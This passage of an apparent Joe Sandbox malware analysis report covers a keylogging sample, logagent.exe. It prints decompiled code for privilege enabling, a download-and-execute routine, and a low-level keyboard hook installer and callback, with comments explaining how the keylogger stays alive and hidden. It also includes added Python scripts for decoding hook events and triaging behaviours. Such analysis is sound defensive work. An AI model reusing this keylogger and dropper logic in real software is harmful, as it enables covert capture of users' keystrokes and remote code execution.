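For an on-disk PE run it as is; for a memory dump that begins at the image base ("based on PE: true" in the Memory Dump Source lines above) pass --mapped, because section contents are then at their RVAs rather than at PointerToRawData. The returned blob is exactly what the sample's LockResource pointer and SizeofResource length describe; anything beyond that (its encoding or decryption) is outside what this listing shows.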

                                  C-Code - Quality: 84%
                                   			E1055059E() {
                                   				void* _v8;
                                   				intOrPtr _v12;
                                   				struct _TOKEN_PRIVILEGES _v24;
                                   				signed int _t14;
                                   
                                   				// Same routine as E0040EC0F (identical Opcode ID and Instruction ID below),
                                   				// here in the 0x10540000 dump; the privilege name is referenced by its
                                   				// address (0x4169d0) instead of appearing inline.
                                   				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);	// 0x28 = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
                                   				LookupPrivilegeValueA(0, 0x4169d0,  &(_v24.Privileges));	// fills Privileges[0].Luid
                                   				_v24.PrivilegeCount = 1;
                                   				_v12 = 2;	// _v12 overlays Privileges[0].Attributes; 2 = SE_PRIVILEGE_ENABLED
                                   				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                   				_t14 = GetLastError();	// may be ERROR_NOT_ALL_ASSIGNED (1300) even though the call returned TRUE
                                   				asm("sbb eax, eax");
                                   				return  ~( ~_t14);	// result derived from GetLastError(); the token handle is never closed
                                   			}

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 105505AB
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 105505B2
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,004169D0,?), ref: 105505C4
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 105505E3
                                  • GetLastError.KERNEL32 ref: 105505E9
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                  • String ID:
                                  • API String ID: 3534403312-0
                                  • Opcode ID: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction ID: 48ce616a36d9155281e91bb523584d4266b4366c7e509a05eb39360af07fb4fb
                                  • Opcode Fuzzy Hash: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction Fuzzy Hash: EFF01271941129FBDB00ABE0ED0DAEF7EBCEB49744F104120B906E1090C6749A08CAA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 1054EF14
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00000000,?,00000000), ref: 1054EF4F
                                  • ??3@YAXPAX@Z.MSVCRT ref: 1054EFD2
                                    • Part of subcall function 10554210: ??2@YAPAXI@Z.MSVCRT ref: 1055422A
                                    • Part of subcall function 10554210: ??3@YAXPAX@Z.MSVCRT ref: 10554275
                                  Strings
                                  • C:\Windows\SysWOW64\logagent.exe, xrefs: 1054EFC5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??3@$??2@DownloadExecuteFileShell
                                  • String ID: C:\Windows\SysWOW64\logagent.exe
                                  • API String ID: 1851352135-431875223
                                  • Opcode ID: da1d121823f736652dcabd748f57677f53e9c544eabdd7e42c2b56f8cba21452
                                  • Instruction ID: 59b5f547a7ff231e4e57488f7a49ed13b5ff250d1baaf8499415d9b0fb9dbfa7
                                  • Opcode Fuzzy Hash: da1d121823f736652dcabd748f57677f53e9c544eabdd7e42c2b56f8cba21452
                                  • Instruction Fuzzy Hash: 82415076910518EBCB059BE0EC9DEEE7B78EF94341F50886AF516E30A0EF706948CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E10546C64(intOrPtr* __ecx) {
                                  				struct tagMSG _v32;
                                  				intOrPtr* _t14;
                                  
                                  				_t14 = __ecx;
                                  				 *0x41b9a8 = __ecx;               // publish the object in a global so the hook callback can reach it
                                  				if( *__ecx != 0) {                // first member holds the HHOOK; non-zero means already installed
                                  					L3:
                                  					// a low-level hook is only delivered while the installing thread pumps messages,
                                  					// so this loop is what keeps the keylogger alive
                                  					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                  						TranslateMessage( &_v32);
                                  						DispatchMessageA( &_v32);
                                  						goto L2;
                                  					}
                                  				} else {
                                  					// 0xd = WH_KEYBOARD_LL, callback at 0x4052ba, hMod = 0, dwThreadId = 0 (all threads)
                                  					 *_t14 = SetWindowsHookExA(0xd, 0x4052ba, 0, 0);
                                  					L2:
                                  					if( *_t14 != 0) {
                                  						goto L3;
                                  					}
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • SetWindowsHookExA.USER32(0000000D,004052BA,00000000,00000000), ref: 10546C83
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10546C96
                                  • TranslateMessage.USER32(?), ref: 10546CA4
                                  • DispatchMessageA.USER32(?), ref: 10546CAE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$DispatchHookTranslateWindows
                                  • String ID:
                                  • API String ID: 1978648212-0
                                  • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction ID: 145b80978c2e18676703df7a4d65f34b7861883bf30e3a53eb5e384c536dff62
                                  • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction Fuzzy Hash: CCF03071900606EBC7209FA6DD4CECBBFFCEBD5B42720453AA485D2055E6748441CB75
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 10546606
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 1054662C
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 1054680C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: 32b674cc9de47bdb2a48e67103b04d5011ae93aaacbb80d256926fcc8fede925
                                  • Instruction ID: c1d1a9eadd3be9a5cc074b44416464c015d45ca05f0af3c7d864d0bb3806b890
                                  • Opcode Fuzzy Hash: 32b674cc9de47bdb2a48e67103b04d5011ae93aaacbb80d256926fcc8fede925
                                  • Instruction Fuzzy Hash: C2711E7280050EEBCB04EBA0EC999EE7B78EF54345F548166F512E30A0EB745649CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			// WH_KEYBOARD_LL callback: _a4 = keylogger object, _a8 = nCode, _a12 = wParam, _a16 = lParam (KBDLLHOOKSTRUCT*)
                                  			E0040532D(struct HHOOK__** _a4, int _a8, int _a12, void* _a16) {
                                  				void* _t19;
                                  				void* _t26;
                                  				struct HHOOK__** _t32;
                                  				signed int _t33;
                                  
                                  				_t32 = _a4;
                                  				_t33 = 5;
                                  				// copy the 20-byte KBDLLHOOKSTRUCT (vkCode, scanCode, flags, time, dwExtraInfo) to object offset 0x40
                                  				memcpy( &(_t32[0x10]), _a16, _t33 << 2);
                                  				if(_a8 == 0) {                           // HC_ACTION: the hook may process this event
                                  					_t19 = _a12 - 0x100;                 // wParam - WM_KEYDOWN
                                  					if(_t19 == 0) {                      // WM_KEYDOWN
                                  						// 0x14 = VK_CAPITAL; 0 and 0xff80 are treated as "Caps Lock off", the flag lives at offset 0x2c
                                  						if(GetKeyState(0x14) == 0 || GetKeyState(0x14) == 0xff80) {
                                  							_t32[0xb] = _t32[0xb] & 0x00000000;
                                  						} else {
                                  							_t32[0xb] = 1;
                                  						}
                                  						E00406BA7(_t32);
                                  						E00406BCB(_t32);
                                  						E00405EB2(_t32);
                                  						if(_t32[0xb] == 0) {
                                  							E00406952(_t32);
                                  						}
                                  						_t32[0xb] = _t32[0xb] & 0x00000000;
                                  					} else {
                                  						_t26 = _t19 - 1;
                                  						if(_t26 == 0) {                  // WM_KEYUP (0x101)
                                  							E00406BB9(_t32);
                                  							E00406BDD(_t32);
                                  							E00406B61(_t32);
                                  						} else {
                                  							if(_t26 == 3) {              // WM_SYSKEYDOWN (0x104)
                                  								E00406AD1(_t32);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				// every path forwards the event, so the victim sees no dropped keystrokes
                                  				return CallNextHookEx( *_t32, _a8, _a12, _a16);
                                  			}

                                  APIs
                                  • GetKeyState.USER32 ref: 00405381
                                  • GetKeyState.USER32 ref: 0040538A
                                    • Part of subcall function 00406AD1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415D38,?), ref: 00406B51
                                  • CallNextHookEx.USER32 ref: 004053CD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                                  • String ID:
                                  • API String ID: 98962008-0
                                  • Opcode ID: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                  • Instruction ID: db2238219e7acabf410f467048d0031229e8bae0499535dbb57e9f22420807a3
                                  • Opcode Fuzzy Hash: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                  • Instruction Fuzzy Hash: A0118E7520461996DF10AF3588817AF3A21EB85344F05547EB9426A2C2CABC98259B5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%
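
                                  Added example, not part of the Joe Sandbox output and not code from the sample: a Python model of how the callback E0040532D above consumes its arguments. It unpacks the 20-byte KBDLLHOOKSTRUCT that the memcpy copies, names the raw constants the decompiler left as numbers (0xd, 0x100, 0x14, ...), and follows the branches to list which callees a given event reaches. The callee names are the decompiled addresses from the listing; what those routines do is not visible on this page, and the sample events at the bottom are constructed.

```python
"""Decode WH_KEYBOARD_LL events the way the callback E0040532D receives them.
Added example; not code from the sample or from Joe Sandbox."""
import struct
from dataclasses import dataclass
from typing import List, Tuple

# Windows SDK values that appear as raw numbers in the decompiled callback.
HC_ACTION = 0             # nCode: the hook may process the event
WM_KEYDOWN = 0x0100       # decompile: _a12 - 0x100 == 0
WM_KEYUP = 0x0101         # decompile: (_a12 - 0x100) - 1 == 0
WM_SYSKEYDOWN = 0x0104    # decompile: (_a12 - 0x100) - 1 == 3
VK_CAPITAL = 0x14         # GetKeyState(0x14)

# KBDLLHOOKSTRUCT.flags bits
LLKHF_EXTENDED = 0x01
LLKHF_INJECTED = 0x10     # event came from SendInput/keybd_event rather than hardware
LLKHF_ALTDOWN = 0x20
LLKHF_UP = 0x80


@dataclass
class KbdLLHookStruct:
    """Five DWORDs = 20 bytes: exactly what memcpy(&_t32[0x10], _a16, 5 << 2) copies."""
    vk_code: int
    scan_code: int
    flags: int
    time: int
    extra_info: int

    @classmethod
    def from_lparam(cls, raw: bytes) -> "KbdLLHookStruct":
        if len(raw) != 20:
            raise ValueError("KBDLLHOOKSTRUCT is 20 bytes on 32-bit Windows")
        return cls(*struct.unpack("<5I", raw))

    @property
    def injected(self) -> bool:
        return bool(self.flags & LLKHF_INJECTED)


def caps_lock_on(get_key_state_result: int) -> bool:
    """Mirror the decompiled test: 0 and 0xFF80 count as 'off', anything else as 'on'.
    GetKeyState sets bit 0 for 'toggled' and bit 15 for 'down'; the SDK-correct test
    is (result & 1) != 0, so the comparison as decompiled misclassifies e.g. 0x8000."""
    return get_key_state_result not in (0, 0xFF80)


def route(n_code: int, w_param: int, raw_lparam: bytes, caps_state: int) -> Tuple[KbdLLHookStruct, List[str]]:
    """Follow the branches of E0040532D for one event and return the callees it reaches.
    Callee names are the decompiled addresses on the page; their bodies are not shown there."""
    event = KbdLLHookStruct.from_lparam(raw_lparam)
    chain: List[str] = []
    if n_code == HC_ACTION:
        if w_param == WM_KEYDOWN:
            chain += ["E00406BA7", "E00406BCB", "E00405EB2"]
            if not caps_lock_on(caps_state):      # _t32[0xb] == 0
                chain.append("E00406952")
        elif w_param == WM_KEYUP:
            chain += ["E00406BB9", "E00406BDD", "E00406B61"]
        elif w_param == WM_SYSKEYDOWN:
            chain.append("E00406AD1")
    chain.append("CallNextHookEx")   # every path ends by passing the event down the hook chain
    return event, chain


def make_lparam(vk: int, scan: int, flags: int, time_ms: int, extra: int = 0) -> bytes:
    """Build a constructed KBDLLHOOKSTRUCT buffer (test input, not captured from the sample)."""
    return struct.pack("<5I", vk, scan, flags, time_ms, extra)


if __name__ == "__main__":
    # constructed: 'A' pressed by hardware, released, then F4 with Alt held (WM_SYSKEYDOWN)
    for n, w, lp in [
        (HC_ACTION, WM_KEYDOWN, make_lparam(0x41, 0x1E, 0, 1000)),
        (HC_ACTION, WM_KEYUP, make_lparam(0x41, 0x1E, LLKHF_UP, 1050)),
        (HC_ACTION, WM_SYSKEYDOWN, make_lparam(0x73, 0x3E, LLKHF_ALTDOWN, 2000)),
    ]:
        ev, callees = route(n, w, lp, caps_state=0)
        print(f"vk={ev.vk_code:#04x} injected={ev.injected} -> {' -> '.join(callees)}")
```

The injected flag is worth keeping in a model like this: a low-level hook also sees keystrokes synthesised by other software, and LLKHF_INJECTED is the only field that tells a hardware press from a SendInput call.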

                                  APIs
                                  • SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 10554F0F
                                    • Part of subcall function 1054D097: RegCreateKeyA.ADVAPI32(10544B0B,80000001,80000001), ref: 1054D0A4
                                    • Part of subcall function 1054D097: RegSetValueExA.ADVAPI32(80000001,1054D2D7,00000000,?,00000000,?,1054D2D7,80000001,10544B0B,?,?,?,?,00000000), ref: 1054D0D0
                                    • Part of subcall function 1054D097: RegCloseKey.ADVAPI32(80000001,?,1054D2D7,80000001,10544B0B,?,?,?,?,00000000), ref: 1054D0DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateInfoParametersSystemValue
                                  • String ID: Control Panel\Desktop
                                  • API String ID: 4127273184-27424756
                                  • Opcode ID: 505890f8fc329ebd808f43419e643c557b26f8c85ea391f63ec330bd5069d550
                                  • Instruction ID: 65f9385c3bef0d29ef4b54e8f476fba7f87e436dfd601ce520c0619164863f24
                                  • Opcode Fuzzy Hash: 505890f8fc329ebd808f43419e643c557b26f8c85ea391f63ec330bd5069d550
                                  • Instruction Fuzzy Hash: 3041E936B50208BBEB1076A49C8BFEF3D3DDBC0750F110056F9159B1C0EAA65A8447EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%
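
                                  Added example, not part of the report: a Python triage script that parses the "APIs" lists in this dump (lines of the form "• Api.MODULE(args), ref: ADDR", including the indented "Part of subcall function" lines) and tags each function block with the behaviours the signatures at the top of the report refer to: token-privilege adjustment, download-and-execute, a WH_KEYBOARD_LL hook together with the message pump that keeps it alive, and the SPI_SETDESKWALLPAPER plus registry-write path. The embedded sample text is copied from the blocks above; the tag names and rules are my own and only cover the API combinations seen on this page.

```python
"""Triage helper for Joe Sandbox function dumps (added example, not part of the report)."""
import re
from typing import Dict, List, Optional, Set

# One API line of a function block, e.g.
#   • SetWindowsHookExA.USER32(0000000D,004052BA,00000000,00000000), ref: 10546C83
#   • GetLastError.KERNEL32 ref: 105505E9
#     • Part of subcall function 10554210: ??2@YAPAXI@Z.MSVCRT ref: 1055422A
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\S+?)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

WH_KEYBOARD_LL = 0x0D          # first argument of SetWindowsHookExA in the hook installer
SPI_SETDESKWALLPAPER = 0x14    # first argument of SystemParametersInfoW in the wallpaper routine

# Constructed input: the API bullets of four blocks above, copied verbatim.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 105505AB
• OpenProcessToken.ADVAPI32(00000000), ref: 105505B2
• LookupPrivilegeValueA.ADVAPI32(00000000,004169D0,?), ref: 105505C4
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 105505E3
• GetLastError.KERNEL32 ref: 105505E9
APIs
• URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 1054EF14
• ShellExecuteW.SHELL32(00000000,0041578C,00000000,?,00000000), ref: 1054EF4F
• ??3@YAXPAX@Z.MSVCRT ref: 1054EFD2
  • Part of subcall function 10554210: ??2@YAPAXI@Z.MSVCRT ref: 1055422A
APIs
• SetWindowsHookExA.USER32(0000000D,004052BA,00000000,00000000), ref: 10546C83
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10546C96
• TranslateMessage.USER32(?), ref: 10546CA4
• DispatchMessageA.USER32(?), ref: 10546CAE
APIs
• SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 10554F0F
  • Part of subcall function 1054D097: RegSetValueExA.ADVAPI32(80000001,1054D2D7,00000000,?,00000000,?,1054D2D7,80000001,10544B0B,?,?,?,?,00000000), ref: 1054D0D0
"""


def parse_api_lines(text: str) -> List[Dict]:
    """Turn the bullet lines of one block into call records; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": [] if args is None else [a.strip() for a in args.split(",")],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub"),   # set when the plugin lifted the call from a callee
        })
    return calls


def arg_int(call: Dict, index: int) -> Optional[int]:
    """Argument as an integer, or None when the plugin printed '?' (value unknown)."""
    try:
        return int(call["args"][index], 16)
    except (IndexError, ValueError):
        return None


def tag_behaviours(calls: List[Dict]) -> Set[str]:
    """Behaviour tags for one block; rules only cover the API combinations seen in this dump."""
    names = {c["api"] for c in calls}

    def has(prefix: str) -> bool:      # prefix match covers the A/W variants
        return any(n.startswith(prefix) for n in names)

    tags: Set[str] = set()
    if "OpenProcessToken" in names and "AdjustTokenPrivileges" in names and has("LookupPrivilegeValue"):
        tags.add("privilege-adjust")
    if has("URLDownloadToFile") and has("ShellExecute"):
        tags.add("download-and-execute")
    if has("GetMessage") and has("DispatchMessage"):
        tags.add("message-pump")
    for c in calls:
        if c["api"].startswith("SetWindowsHookEx") and arg_int(c, 0) == WH_KEYBOARD_LL:
            tags.add("ll-keyboard-hook")
        if c["api"].startswith("SystemParametersInfo") and arg_int(c, 0) == SPI_SETDESKWALLPAPER:
            tags.add("wallpaper-change")
        if c["api"].startswith("RegSetValueEx"):
            tags.add("registry-write")
    if {"ll-keyboard-hook", "message-pump"} <= tags:
        tags.add("keylogger-install")  # the hook and the loop that keeps it alive, in one function
    return tags


def triage(report_text: str) -> List[Dict]:
    """Split the dump at every 'APIs' heading and tag each function block."""
    results = []
    for block in re.split(r"^APIs[ \t]*$", report_text, flags=re.MULTILINE):
        calls = parse_api_lines(block)
        if not calls:
            continue
        direct = [c["ref"] for c in calls if c["subcall"] is None] or [c["ref"] for c in calls]
        results.append({"first_ref": min(direct), "calls": calls, "tags": tag_behaviours(calls)})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE):
        print(f"{r['first_ref']:08X}: {sorted(r['tags']) or ['(no rule matched)']}")
```

Argument values are matched where the API alone is ambiguous: SetWindowsHookEx is only interesting here with WH_KEYBOARD_LL in the first slot, and SystemParametersInfo only with SPI_SETDESKWALLPAPER, which is why the parser keeps the hex arguments rather than just the names.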

                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000), ref: 1055217E
                                    • Part of subcall function 1055476E: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,105435A8,00000000), ref: 10554788
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateFindFirst
                                  • String ID:
                                  • API String ID: 41799849-0
                                  • Opcode ID: 29dfd08cac935525e194297bb2b6ff9530471a542e089813cab2a41ff7bd284c
                                  • Instruction ID: cc21ef633f3382e49ece5fd0496077f0ec07c73ee919e3918cca91614f9089bb
                                  • Opcode Fuzzy Hash: 29dfd08cac935525e194297bb2b6ff9530471a542e089813cab2a41ff7bd284c
                                  • Instruction Fuzzy Hash: 10B1FB72D0050DEBCB04EBA0EC59EEEBB7CEF54245F148166F516A30A0EB746A49CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000), ref: 10544CD1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: 8dcb216ad44b1f45a83daa5b669e69c72900e8f2089c73d5f45497b925a001b9
                                  • Instruction ID: bb1135f6e1ca62a2e60aa2555fd08207f31fd70920e7a0356f32943d8581113f
                                  • Opcode Fuzzy Hash: 8dcb216ad44b1f45a83daa5b669e69c72900e8f2089c73d5f45497b925a001b9
                                  • Instruction Fuzzy Hash: 6641EA7680050DEBCF44ABA0DC59DEEBF7CEB98255F404166F512D30A0EF70A689CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405156(void* __ecx) {
                                  				signed int _t3;
                                  				signed int _t4;
                                  				intOrPtr _t6;
                                  				intOrPtr _t7;
                                  				void* _t8;
                                  
                                  				_t8 = __ecx;
                                  				_t3 = GetKeyboardLayout(0);             // HKL of the calling thread
                                  				_t4 = _t3 & 0x000003ff;                 // low 10 bits = primary language ID
                                  				_t6 = 9;                                // LANG_ENGLISH
                                  				if(_t4 == _t6) {
                                  					L3:
                                  					// object field +0x38 becomes 0x10 only for Italian layouts and 9 for every other layout
                                  					 *((intOrPtr*)(_t8 + 0x38)) = _t6;
                                  					return _t4;
                                  				} else {
                                  					_t7 = 0x10;                         // LANG_ITALIAN
                                  					if(_t4 != _t7) {
                                  						goto L3;
                                  					} else {
                                  						 *((intOrPtr*)(_t8 + 0x38)) = _t7;
                                  						return _t4;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayout
                                  • String ID:
                                  • API String ID: 194098044-0
                                  • Opcode ID: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                  • Instruction ID: 21b9efa670f21c68742e6ddf4daf796ac161ac54f97a083ce8069b5058884fb0
                                  • Opcode Fuzzy Hash: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                  • Instruction Fuzzy Hash: 27D05E36948B204EE764A618B882BE232A0EB94731F95443BE5821AAD4E5A468C20658
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			// same routine as E00405156 in the 0x400000 image (identical Opcode ID), here in the 0x10540000 copy
                                  			E10546AE5(void* __ecx) {
                                  				signed int _t3;
                                  				signed int _t4;
                                  				intOrPtr _t6;
                                  				intOrPtr _t7;
                                  				void* _t8;
                                  
                                  				_t8 = __ecx;
                                  				_t3 = GetKeyboardLayout(0);             // HKL of the calling thread
                                  				_t4 = _t3 & 0x000003ff;                 // primary language ID
                                  				_t6 = 9;                                // LANG_ENGLISH
                                  				if(_t4 == _t6) {
                                  					L3:
                                  					 *((intOrPtr*)(_t8 + 0x38)) = _t6;
                                  					return _t4;
                                  				} else {
                                  					_t7 = 0x10;                         // LANG_ITALIAN
                                  					if(_t4 != _t7) {
                                  						goto L3;
                                  					} else {
                                  						 *((intOrPtr*)(_t8 + 0x38)) = _t7;
                                  						return _t4;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • GetKeyboardLayout.USER32(00000000), ref: 10546AEA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayout
                                  • String ID:
                                  • API String ID: 194098044-0
                                  • Opcode ID: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                  • Instruction ID: db9f0fae980a080f7ea919997120f19ac03c2e90a70e37e3a9b5e17c641c71b0
                                  • Opcode Fuzzy Hash: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                  • Instruction Fuzzy Hash: 2AD0A7379487219EF394A718B8427D02AD0EB94731FA2843BE5828B9D4E4E068C34264
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E1054B80C(void* __ecx, intOrPtr _a4) {
                                  				char _v5;
                                  				char _v8;
                                  
                                  				// 0x800 = LOCALE_SYSTEM_DEFAULT, 0x5a = LOCALE_SABBREVCTRYNAME: a 2-letter country code plus NUL fits the 3-byte buffer
                                  				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
                                  				// indirect call through the pointer stored at 0x415318 (not resolved in this dump)
                                  				 *0x415318( &_v8,  &_v5, __ecx);
                                  				return _a4;
                                  			}

                                  APIs
                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,0041BFB8,?,1054E673,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,004166C4), ref: 1054B81D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                  • Instruction ID: 6bf4cb4ccd2def3a4df93ba3bf87f565bdd40bf68ca9332086adf1bee5c68202
                                  • Opcode Fuzzy Hash: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                  • Instruction Fuzzy Hash: 80E0EC7560020DFBDB00DB90DC45ECA776CAB48745F004051BA0296190D670A7088BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			// cpuid wrapper: _a8 appears to be the leaf loaded into eax, the four result DWORDs go to the buffer at _a4.
                                  			// The decompiler only shows edx being stored; the eax/ebx/ecx register-to-slot mapping was lost.
